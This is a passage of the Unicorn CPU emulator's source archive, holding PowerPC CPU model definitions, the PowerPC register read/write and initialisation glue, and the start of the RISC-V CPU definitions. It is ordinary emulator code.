CPU_POWERPC_750CL_v20, 750cl, "PowerPC 750CL v2.0") POWERPC_DEF("750cx_v1.0", CPU_POWERPC_750CX_v10, 750cx, "PowerPC 750CX v1.0 (G3 embedded)") POWERPC_DEF("750cx_v2.0", CPU_POWERPC_750CX_v20, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.1", CPU_POWERPC_750CX_v21, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.2", CPU_POWERPC_750CX_v22, 750cx, "PowerPC 750CX v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.1", CPU_POWERPC_750CXE_v21, 750cx, "PowerPC 750CXe v2.1 (G3 embedded)") POWERPC_DEF("750cxe_v2.2", CPU_POWERPC_750CXE_v22, 750cx, "PowerPC 750CXe v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.3", CPU_POWERPC_750CXE_v23, 750cx, "PowerPC 750CXe v2.3 (G3 embedded)") POWERPC_DEF("750cxe_v2.4", CPU_POWERPC_750CXE_v24, 750cx, "PowerPC 750CXe v2.4 (G3 embedded)") POWERPC_DEF("750cxe_v2.4b", CPU_POWERPC_750CXE_v24b, 750cx, "PowerPC 750CXe v2.4b (G3 embedded)") POWERPC_DEF("750cxe_v3.0", CPU_POWERPC_750CXE_v30, 750cx, "PowerPC 750CXe v3.0 (G3 embedded)") POWERPC_DEF("750cxe_v3.1", CPU_POWERPC_750CXE_v31, 750cx, "PowerPC 750CXe v3.1 (G3 embedded)") POWERPC_DEF("750cxe_v3.1b", CPU_POWERPC_750CXE_v31b, 750cx, "PowerPC 750CXe v3.1b (G3 embedded)") POWERPC_DEF("750cxr", CPU_POWERPC_750CXR, 750cx, "PowerPC 750CXr (G3 embedded)") POWERPC_DEF("750fl", CPU_POWERPC_750FL, 750fx, "PowerPC 750FL (G3 embedded)") POWERPC_DEF("750fx_v1.0", CPU_POWERPC_750FX_v10, 750fx, "PowerPC 750FX v1.0 (G3 embedded)") POWERPC_DEF("750fx_v2.0", CPU_POWERPC_750FX_v20, 750fx, "PowerPC 750FX v2.0 (G3 embedded)") POWERPC_DEF("750fx_v2.1", CPU_POWERPC_750FX_v21, 750fx, "PowerPC 750FX v2.1 (G3 embedded)") POWERPC_DEF("750fx_v2.2", CPU_POWERPC_750FX_v22, 750fx, "PowerPC 750FX v2.2 (G3 embedded)") POWERPC_DEF("750fx_v2.3", CPU_POWERPC_750FX_v23, 750fx, "PowerPC 750FX v2.3 (G3 embedded)") POWERPC_DEF("750gl", CPU_POWERPC_750GL, 750gx, "PowerPC 750GL (G3 embedded)") POWERPC_DEF("750gx_v1.0", CPU_POWERPC_750GX_v10, 750gx, "PowerPC 750GX v1.0 (G3 embedded)") POWERPC_DEF("750gx_v1.1", CPU_POWERPC_750GX_v11, 750gx, "PowerPC 750GX v1.1 (G3 embedded)") POWERPC_DEF("750gx_v1.2", CPU_POWERPC_750GX_v12, 750gx, "PowerPC 750GX v1.2 (G3 embedded)") POWERPC_DEF("750l_v2.0", CPU_POWERPC_750L_v20, 750, "PowerPC 750L v2.0 (G3 embedded)") POWERPC_DEF("750l_v2.1", CPU_POWERPC_750L_v21, 750, "PowerPC 750L v2.1 (G3 embedded)") POWERPC_DEF("750l_v2.2", CPU_POWERPC_750L_v22, 750, "PowerPC 750L v2.2 (G3 embedded)") POWERPC_DEF("750l_v3.0", CPU_POWERPC_750L_v30, 750, "PowerPC 750L v3.0 (G3 embedded)") POWERPC_DEF("750l_v3.2", CPU_POWERPC_750L_v32, 750, "PowerPC 750L v3.2 (G3 embedded)") POWERPC_DEF("745_v1.0", CPU_POWERPC_7x5_v10, 745, "PowerPC 745 v1.0") POWERPC_DEF("755_v1.0", CPU_POWERPC_7x5_v10, 755, "PowerPC 755 v1.0") POWERPC_DEF("745_v1.1", CPU_POWERPC_7x5_v11, 745, "PowerPC 745 v1.1") POWERPC_DEF("755_v1.1", CPU_POWERPC_7x5_v11, 755, "PowerPC 755 v1.1") POWERPC_DEF("745_v2.0", CPU_POWERPC_7x5_v20, 745, "PowerPC 745 v2.0") POWERPC_DEF("755_v2.0", CPU_POWERPC_7x5_v20, 755, "PowerPC 755 v2.0") POWERPC_DEF("745_v2.1", CPU_POWERPC_7x5_v21, 745, "PowerPC 745 v2.1") POWERPC_DEF("755_v2.1", CPU_POWERPC_7x5_v21, 755, "PowerPC 755 v2.1") POWERPC_DEF("745_v2.2", CPU_POWERPC_7x5_v22, 745, "PowerPC 745 v2.2") POWERPC_DEF("755_v2.2", CPU_POWERPC_7x5_v22, 755, "PowerPC 755 v2.2") POWERPC_DEF("745_v2.3", CPU_POWERPC_7x5_v23, 745, "PowerPC 745 v2.3") POWERPC_DEF("755_v2.3", CPU_POWERPC_7x5_v23, 755, "PowerPC 755 v2.3") POWERPC_DEF("745_v2.4", CPU_POWERPC_7x5_v24, 745, "PowerPC 745 v2.4") POWERPC_DEF("755_v2.4", CPU_POWERPC_7x5_v24, 755, "PowerPC 755 v2.4") POWERPC_DEF("745_v2.5", CPU_POWERPC_7x5_v25, 745, "PowerPC 745 v2.5") POWERPC_DEF("755_v2.5", CPU_POWERPC_7x5_v25, 755, "PowerPC 755 v2.5") POWERPC_DEF("745_v2.6", CPU_POWERPC_7x5_v26, 745, "PowerPC 745 v2.6") POWERPC_DEF("755_v2.6", CPU_POWERPC_7x5_v26, 755, "PowerPC 755 v2.6") POWERPC_DEF("745_v2.7", CPU_POWERPC_7x5_v27, 745, "PowerPC 745 v2.7") POWERPC_DEF("755_v2.7", CPU_POWERPC_7x5_v27, 755, "PowerPC 755 v2.7") POWERPC_DEF("745_v2.8", CPU_POWERPC_7x5_v28, 745, "PowerPC 745 v2.8") POWERPC_DEF("755_v2.8", CPU_POWERPC_7x5_v28, 755, "PowerPC 755 v2.8") /* PowerPC 74xx family */ POWERPC_DEF("7400_v1.0", CPU_POWERPC_7400_v10, 7400, "PowerPC 7400 v1.0 (G4)") POWERPC_DEF("7400_v1.1", CPU_POWERPC_7400_v11, 7400, "PowerPC 7400 v1.1 (G4)") POWERPC_DEF("7400_v2.0", CPU_POWERPC_7400_v20, 7400, "PowerPC 7400 v2.0 (G4)") POWERPC_DEF("7400_v2.1", CPU_POWERPC_7400_v21, 7400, "PowerPC 7400 v2.1 (G4)") POWERPC_DEF("7400_v2.2", CPU_POWERPC_7400_v22, 7400, "PowerPC 7400 v2.2 (G4)") POWERPC_DEF("7400_v2.6", CPU_POWERPC_7400_v26, 7400, "PowerPC 7400 v2.6 (G4)") POWERPC_DEF("7400_v2.7", CPU_POWERPC_7400_v27, 7400, "PowerPC 7400 v2.7 (G4)") POWERPC_DEF("7400_v2.8", CPU_POWERPC_7400_v28, 7400, "PowerPC 7400 v2.8 (G4)") POWERPC_DEF("7400_v2.9", CPU_POWERPC_7400_v29, 7400, "PowerPC 7400 v2.9 (G4)") POWERPC_DEF("7410_v1.0", CPU_POWERPC_7410_v10, 7410, "PowerPC 7410 v1.0 (G4)") POWERPC_DEF("7410_v1.1", CPU_POWERPC_7410_v11, 7410, "PowerPC 7410 v1.1 (G4)") POWERPC_DEF("7410_v1.2", CPU_POWERPC_7410_v12, 7410, "PowerPC 7410 v1.2 (G4)") POWERPC_DEF("7410_v1.3", CPU_POWERPC_7410_v13, 7410, "PowerPC 7410 v1.3 (G4)") POWERPC_DEF("7410_v1.4", CPU_POWERPC_7410_v14, 7410, "PowerPC 7410 v1.4 (G4)") POWERPC_DEF("7448_v1.0", CPU_POWERPC_7448_v10, 7400, "PowerPC 7448 v1.0 (G4)") POWERPC_DEF("7448_v1.1", CPU_POWERPC_7448_v11, 7400, "PowerPC 7448 v1.1 (G4)") POWERPC_DEF("7448_v2.0", CPU_POWERPC_7448_v20, 7400, "PowerPC 7448 v2.0 (G4)") POWERPC_DEF("7448_v2.1", CPU_POWERPC_7448_v21, 7400, "PowerPC 7448 v2.1 (G4)") POWERPC_DEF("7450_v1.0", CPU_POWERPC_7450_v10, 7450, "PowerPC 7450 v1.0 (G4)") POWERPC_DEF("7450_v1.1", CPU_POWERPC_7450_v11, 7450, "PowerPC 7450 v1.1 (G4)") POWERPC_DEF("7450_v1.2", CPU_POWERPC_7450_v12, 7450, "PowerPC 7450 v1.2 (G4)") POWERPC_DEF("7450_v2.0", CPU_POWERPC_7450_v20, 7450, "PowerPC 7450 v2.0 (G4)") POWERPC_DEF("7450_v2.1", CPU_POWERPC_7450_v21, 7450, "PowerPC 7450 v2.1 (G4)") POWERPC_DEF("7441_v2.1", CPU_POWERPC_7450_v21, 7440, "PowerPC 7441 v2.1 (G4)") POWERPC_DEF("7441_v2.3", CPU_POWERPC_74x1_v23, 7440, "PowerPC 7441 v2.3 (G4)") POWERPC_DEF("7451_v2.3", CPU_POWERPC_74x1_v23, 7450, "PowerPC 7451 v2.3 (G4)") POWERPC_DEF("7441_v2.10", CPU_POWERPC_74x1_v210, 7440, "PowerPC 7441 v2.10 (G4)") POWERPC_DEF("7451_v2.10", CPU_POWERPC_74x1_v210, 7450, "PowerPC 7451 v2.10 (G4)") POWERPC_DEF("7445_v1.0", CPU_POWERPC_74x5_v10, 7445, "PowerPC 7445 v1.0 (G4)") POWERPC_DEF("7455_v1.0", CPU_POWERPC_74x5_v10, 7455, "PowerPC 7455 v1.0 (G4)") POWERPC_DEF("7445_v2.1", CPU_POWERPC_74x5_v21, 7445, "PowerPC 7445 v2.1 (G4)") POWERPC_DEF("7455_v2.1", CPU_POWERPC_74x5_v21, 7455, "PowerPC 7455 v2.1 (G4)") POWERPC_DEF("7445_v3.2", CPU_POWERPC_74x5_v32, 7445, "PowerPC 7445 v3.2 (G4)") POWERPC_DEF("7455_v3.2", CPU_POWERPC_74x5_v32, 7455, "PowerPC 7455 v3.2 (G4)") POWERPC_DEF("7445_v3.3", CPU_POWERPC_74x5_v33, 7445, "PowerPC 7445 v3.3 (G4)") POWERPC_DEF("7455_v3.3", CPU_POWERPC_74x5_v33, 7455, "PowerPC 7455 v3.3 (G4)") POWERPC_DEF("7445_v3.4", CPU_POWERPC_74x5_v34, 7445, "PowerPC 7445 v3.4 (G4)") POWERPC_DEF("7455_v3.4", CPU_POWERPC_74x5_v34, 7455, "PowerPC 7455 v3.4 (G4)") POWERPC_DEF("7447_v1.0", CPU_POWERPC_74x7_v10, 7445, "PowerPC 7447 v1.0 (G4)") POWERPC_DEF("7457_v1.0", CPU_POWERPC_74x7_v10, 7455, "PowerPC 7457 v1.0 (G4)") POWERPC_DEF("7447_v1.1", CPU_POWERPC_74x7_v11, 7445, "PowerPC 7447 v1.1 (G4)") POWERPC_DEF("7457_v1.1", CPU_POWERPC_74x7_v11, 7455, "PowerPC 7457 v1.1 (G4)") POWERPC_DEF("7457_v1.2", CPU_POWERPC_74x7_v12, 7455, "PowerPC 7457 v1.2 (G4)") POWERPC_DEF("7447a_v1.0", CPU_POWERPC_74x7A_v10, 7445, "PowerPC 7447A v1.0 (G4)") POWERPC_DEF("7457a_v1.0", CPU_POWERPC_74x7A_v10, 7455, "PowerPC 7457A v1.0 (G4)") POWERPC_DEF("7447a_v1.1", CPU_POWERPC_74x7A_v11, 7445, "PowerPC 7447A v1.1 (G4)") POWERPC_DEF("7457a_v1.1", CPU_POWERPC_74x7A_v11, 7455, "PowerPC 7457A v1.1 (G4)") POWERPC_DEF("7447a_v1.2", CPU_POWERPC_74x7A_v12, 7445, "PowerPC 7447A v1.2 (G4)") POWERPC_DEF("7457a_v1.2", CPU_POWERPC_74x7A_v12, 7455, "PowerPC 7457A v1.2 (G4)") #ifdef TARGET_PPC64 POWERPC_DEF_SVR("e5500", "e5500", CPU_POWERPC_e5500, POWERPC_SVR_E500, e5500) POWERPC_DEF_SVR("e6500", "e6500", CPU_POWERPC_e6500, POWERPC_SVR_E500, e6500) POWERPC_DEF("970_v2.2", CPU_POWERPC_970_v22, 970, "PowerPC 970 v2.2") POWERPC_DEF("970fx_v1.0", CPU_POWERPC_970FX_v10, 970, "PowerPC 970FX v1.0 (G5)") POWERPC_DEF("970fx_v2.0", CPU_POWERPC_970FX_v20, 970, "PowerPC 970FX v2.0 (G5)") POWERPC_DEF("970fx_v2.1", CPU_POWERPC_970FX_v21, 970, "PowerPC 970FX v2.1 (G5)") POWERPC_DEF("970fx_v3.0", CPU_POWERPC_970FX_v30, 970, "PowerPC 970FX v3.0 (G5)") POWERPC_DEF("970fx_v3.1", CPU_POWERPC_970FX_v31, 970, "PowerPC 970FX v3.1 (G5)") POWERPC_DEF("970mp_v1.0", CPU_POWERPC_970MP_v10, 970, "PowerPC 970MP v1.0") POWERPC_DEF("970mp_v1.1", CPU_POWERPC_970MP_v11, 970, "PowerPC 970MP v1.1") POWERPC_DEF("power5+_v2.1", CPU_POWERPC_POWER5P_v21, POWER5P, "POWER5+ v2.1") POWERPC_DEF("power7_v2.3", CPU_POWERPC_POWER7_v23, POWER7, "POWER7 v2.3") POWERPC_DEF("power7+_v2.1", CPU_POWERPC_POWER7P_v21, POWER7, "POWER7+ v2.1") POWERPC_DEF("power8e_v2.1", CPU_POWERPC_POWER8E_v21, POWER8, "POWER8E v2.1") POWERPC_DEF("power8_v2.0", CPU_POWERPC_POWER8_v20, POWER8, "POWER8 v2.0") POWERPC_DEF("power8nvl_v1.0", CPU_POWERPC_POWER8NVL_v10, POWER8, "POWER8NVL v1.0") POWERPC_DEF("power9_v1.0", CPU_POWERPC_POWER9_DD1, POWER9, "POWER9 v1.0") POWERPC_DEF("power9_v2.0", CPU_POWERPC_POWER9_DD20, POWER9, "POWER9 v2.0") POWERPC_DEF("power10_v1.0", CPU_POWERPC_POWER10_DD1, POWER10, "POWER10 v1.0") #endif /* defined (TARGET_PPC64) */ }; PowerPCCPU *cpu_ppc_init(struct uc_struct *uc) { PowerPCCPU *cpu; CPUState *cs; CPUClass *cc; PowerPCCPUClass *pcc; cpu = malloc(sizeof(*cpu)); if (cpu == NULL) { return NULL; } memset(cpu, 0, sizeof(*cpu)); #ifdef TARGET_PPC64 if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_PPC64_POWER10_V1_0 + UC_CPU_PPC32_7457A_V1_2 + 1; // power10_v1.0 } else if (uc->cpu_model + UC_CPU_PPC32_7457A_V1_2 + 1 >= ARRAY_SIZE(ppc_cpus)) { free(cpu); return NULL; } #else if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_PPC32_7457A_V1_2; // 7457a_v1.2 } else if (uc->cpu_model >= ARRAY_SIZE(ppc_cpus)) { free(cpu); return NULL; } #endif cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init PowerPCCPUClass */ ppc_cpu_class_init(uc, cc); /* init PowerPC family class */ pcc = &cpu->cc; pcc->pvr = ppc_cpus[uc->cpu_model].pvr; pcc->svr = ppc_cpus[uc->cpu_model].svr; if (ppc_cpus[uc->cpu_model].cpu_family_class_init) { ppc_cpus[uc->cpu_model].cpu_family_class_init(cc, uc); } /* init CPUState */ cpu_common_initfn(uc, cs); /* init PowerPCCPU */ ppc_cpu_instance_init(uc, cs); /* init PowerPC types */ /* postinit PowerPCCPU */ /* realize PowerPCCPU */ ppc_cpu_realize(uc, cs); /* realize CPUState */ // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); ppc_cpu_reset((CPUState *)cpu); return cpu; } ��������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/unicorn.c�������������������������������������������������������������0000664�0000000�0000000�00000020313�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/osdep.h" #include "hw/ppc/ppc.h" #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" #include "helper_regs.h" #include "cpu.h" #ifdef TARGET_PPC64 typedef uint64_t ppcreg_t; #else typedef uint32_t ppcreg_t; #endif // Unicorn version to ensure writing MSR without exception static inline int uc_ppc_store_msr(CPUPPCState *env, target_ulong value, int alter_hv) { // int excp; // CPUState *cs = env_cpu(env); // excp = 0; value &= env->msr_mask; /* Neither mtmsr nor guest state can alter HV */ if (!alter_hv || !(env->msr & MSR_HVB)) { value &= ~MSR_HVB; value |= env->msr & MSR_HVB; } if (((value >> MSR_IR) & 1) != msr_ir || ((value >> MSR_DR) & 1) != msr_dr) { // cpu_interrupt_exittb(cs); } if ((env->mmu_model & POWERPC_MMU_BOOKE) && ((value >> MSR_GS) & 1) != msr_gs) { // cpu_interrupt_exittb(cs); } if (unlikely((env->flags & POWERPC_FLAG_TGPR) && ((value ^ env->msr) & (1 << MSR_TGPR)))) { /* Swap temporary saved registers with GPRs */ hreg_swap_gpr_tgpr(env); } if (unlikely((value >> MSR_EP) & 1) != msr_ep) { /* Change the exception prefix on PowerPC 601 */ env->excp_prefix = ((value >> MSR_EP) & 1) * 0xFFF00000; } /* * If PR=1 then EE, IR and DR must be 1 * * Note: We only enforce this on 64-bit server processors. * It appears that: * - 32-bit implementations supports PR=1 and EE/DR/IR=0 and MacOS * exploits it. * - 64-bit embedded implementations do not need any operation to be * performed when PR is set. */ if (is_book3s_arch2x(env) && ((value >> MSR_PR) & 1)) { value |= (1 << MSR_EE) | (1 << MSR_DR) | (1 << MSR_IR); } env->msr = value; hreg_compute_hflags(env); // if (unlikely(msr_pow == 1)) { // if (!env->pending_interrupts && (*env->check_pow)(env)) { // cs->halted = 1; // excp = EXCP_HALTED; // } // } return 0; } static void ppc_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUPPCState *)uc->cpu->env_ptr)->nip = address; } static uint64_t ppc_get_pc(struct uc_struct *uc) { return ((CPUPPCState *)uc->cpu->env_ptr)->nip; } void ppc_cpu_instance_finalize(CPUState *obj); void ppc_cpu_unrealize(CPUState *dev); static void ppc_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; PowerPCCPU *cpu = (PowerPCCPU *)tcg_ctx->uc->cpu; CPUPPCState *env = &cpu->env; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } for (i = 0; i < 32; i++) { g_free(tcg_ctx->cpu_gpr[i]); } // g_free(tcg_ctx->cpu_PC); g_free(tcg_ctx->btarget); g_free(tcg_ctx->bcond); g_free(tcg_ctx->cpu_dspctrl); // g_free(tcg_ctx->tb_ctx.tbs); if (env->nb_tlb != 0) { switch (env->tlb_type) { case TLB_6XX: g_free(env->tlb.tlb6); break; case TLB_EMB: g_free(env->tlb.tlbe); break; case TLB_MAS: g_free(env->tlb.tlbm); break; } } ppc_cpu_instance_finalize(tcg_ctx->uc->cpu); ppc_cpu_unrealize(tcg_ctx->uc->cpu); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env; env = uc->cpu->env_ptr; memset(env->gpr, 0, sizeof(env->gpr)); env->nip = 0; } // http://www.csit-sun.pub.ro/~cpop/Documentatie_SMP/Motorola_PowerPC/PowerPc/GenInfo/pemch2.pdf DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUPPCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_PPC_REG_0 && regid <= UC_PPC_REG_31) { CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->gpr[regid - UC_PPC_REG_0]; } else if (regid >= UC_PPC_REG_FPR0 && regid <= UC_PPC_REG_FPR31) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->vsr[regid - UC_PPC_REG_FPR0].VsrD(0); } else if (regid >= UC_PPC_REG_CR0 && regid <= UC_PPC_REG_CR7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->crf[regid - UC_PPC_REG_CR0]; } else { switch (regid) { default: break; case UC_PPC_REG_PC: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->nip; break; case UC_PPC_REG_CR: { CHECK_REG_TYPE(uint32_t); int i; uint32_t val = 0; for (i = 0; i < 8; i++) { val <<= 4; val |= env->crf[i]; } *(uint32_t *)value = val; break; } case UC_PPC_REG_LR: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->lr; break; case UC_PPC_REG_CTR: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->ctr; break; case UC_PPC_REG_MSR: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->msr; break; case UC_PPC_REG_XER: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->xer; break; case UC_PPC_REG_FPSCR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->fpscr; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUPPCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_PPC_REG_0 && regid <= UC_PPC_REG_31) { CHECK_REG_TYPE(ppcreg_t); env->gpr[regid - UC_PPC_REG_0] = *(ppcreg_t *)value; } else if (regid >= UC_PPC_REG_FPR0 && regid <= UC_PPC_REG_FPR31) { CHECK_REG_TYPE(uint64_t); env->vsr[regid - UC_PPC_REG_FPR0].VsrD(0) = *(uint64_t *)value; } else if (regid >= UC_PPC_REG_CR0 && regid <= UC_PPC_REG_CR7) { CHECK_REG_TYPE(uint32_t); env->crf[regid - UC_PPC_REG_CR0] = (*(uint32_t *)value) & 0b1111; } else { switch (regid) { default: break; case UC_PPC_REG_PC: CHECK_REG_TYPE(ppcreg_t); env->nip = *(ppcreg_t *)value; *setpc = 1; break; case UC_PPC_REG_CR: { CHECK_REG_TYPE(uint32_t); int i; uint32_t val = *(uint32_t *)value; for (i = 7; i >= 0; i--) { env->crf[i] = val & 0b1111; val >>= 4; } break; } case UC_PPC_REG_LR: CHECK_REG_TYPE(ppcreg_t); env->lr = *(ppcreg_t *)value; break; case UC_PPC_REG_CTR: CHECK_REG_TYPE(ppcreg_t); env->ctr = *(ppcreg_t *)value; break; case UC_PPC_REG_MSR: CHECK_REG_TYPE(ppcreg_t); uc_ppc_store_msr(env, *(ppcreg_t *)value, 0); break; case UC_PPC_REG_XER: CHECK_REG_TYPE(uint32_t); env->xer = *(uint32_t *)value; break; case UC_PPC_REG_FPSCR: CHECK_REG_TYPE(uint32_t); store_fpscr(env, *(uint32_t *)value, 0xffffffff); break; } } return ret; } PowerPCCPU *cpu_ppc_init(struct uc_struct *uc); static int ppc_cpus_init(struct uc_struct *uc, const char *cpu_model) { PowerPCCPU *cpu; cpu = cpu_ppc_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = ppc_release; uc->set_pc = ppc_set_pc; uc->get_pc = ppc_get_pc; uc->cpus_init = ppc_cpus_init; uc->cpu_context_size = offsetof(CPUPPCState, uc); uc_common_init(uc); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/unicorn.h�������������������������������������������������������������0000664�0000000�0000000�00000001362�14675241067�0020053�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_PPC_H #define UC_QEMU_TARGET_PPC_H // functions to read & write registers uc_err reg_read_ppc(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_ppc64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_ppc(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_ppc64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_ppc(struct uc_struct *uc); void uc_init_ppc64(struct uc_struct *uc); #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016567�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/README��������������������������������������������������������������0000664�0000000�0000000�00000000323�14675241067�0017445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������code under riscv32/ is from riscv32-softmmu/target/riscv/*.inc.c code under riscv64/ is from riscv64-softmmu/target/riscv/*.inc.c WARNING: these code are autogen from scripts/decodetree.py, DO NOT modify them. �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu-param.h���������������������������������������������������������0000664�0000000�0000000�00000001122�14675241067�0020621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V cpu parameters for qemu. * * Copyright (c) 2017-2018 SiFive, Inc. * SPDX-License-Identifier: GPL-2.0+ */ #ifndef RISCV_CPU_PARAM_H #define RISCV_CPU_PARAM_H 1 #if defined(TARGET_RISCV64) # define TARGET_LONG_BITS 64 # define TARGET_PHYS_ADDR_SPACE_BITS 56 /* 44-bit PPN */ # define TARGET_VIRT_ADDR_SPACE_BITS 48 /* sv48 */ #elif defined(TARGET_RISCV32) # define TARGET_LONG_BITS 32 # define TARGET_PHYS_ADDR_SPACE_BITS 34 /* 22-bit PPN */ # define TARGET_VIRT_ADDR_SPACE_BITS 32 /* sv32 */ #endif #define TARGET_PAGE_BITS 12 /* 4 KiB Pages */ #define NB_MMU_MODES 4 #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu.c���������������������������������������������������������������0000664�0000000�0000000�00000026022�14675241067�0017524�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU RISC-V CPU * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2017-2018 SiFive, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/ctype.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" #include "fpu/softfloat-helpers.h" #include <uc_priv.h> /* RISC-V CPU definitions */ // static const char riscv_exts[26] = "IEMAFDQCLBJTPVNSUHKORWXYZG"; const char * const riscv_int_regnames[] = { "x0/zero", "x1/ra", "x2/sp", "x3/gp", "x4/tp", "x5/t0", "x6/t1", "x7/t2", "x8/s0", "x9/s1", "x10/a0", "x11/a1", "x12/a2", "x13/a3", "x14/a4", "x15/a5", "x16/a6", "x17/a7", "x18/s2", "x19/s3", "x20/s4", "x21/s5", "x22/s6", "x23/s7", "x24/s8", "x25/s9", "x26/s10", "x27/s11", "x28/t3", "x29/t4", "x30/t5", "x31/t6" }; const char * const riscv_fpr_regnames[] = { "f0/ft0", "f1/ft1", "f2/ft2", "f3/ft3", "f4/ft4", "f5/ft5", "f6/ft6", "f7/ft7", "f8/fs0", "f9/fs1", "f10/fa0", "f11/fa1", "f12/fa2", "f13/fa3", "f14/fa4", "f15/fa5", "f16/fa6", "f17/fa7", "f18/fs2", "f19/fs3", "f20/fs4", "f21/fs5", "f22/fs6", "f23/fs7", "f24/fs8", "f25/fs9", "f26/fs10", "f27/fs11", "f28/ft8", "f29/ft9", "f30/ft10", "f31/ft11" }; static void set_misa(CPURISCVState *env, target_ulong misa) { env->misa_mask = env->misa = misa; } static void set_priv_version(CPURISCVState *env, int priv_ver) { env->priv_ver = priv_ver; } static void set_feature(CPURISCVState *env, int feature) { env->features |= (1ULL << feature); } static void set_resetvec(CPURISCVState *env, int resetvec) { env->resetvec = resetvec; } static void riscv_any_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RVXLEN | RVI | RVM | RVA | RVF | RVD | RVC | RVU); set_priv_version(env, PRIV_VERSION_1_11_0); set_resetvec(env, DEFAULT_RSTVEC); } #if defined(TARGET_RISCV32) // rv32 static void riscv_base32_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; /* We set this in the realise function */ set_misa(env, 0); } // sifive-u34 static void rv32gcsu_priv1_10_0_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV32 | RVI | RVM | RVA | RVF | RVD | RVC | RVS | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, 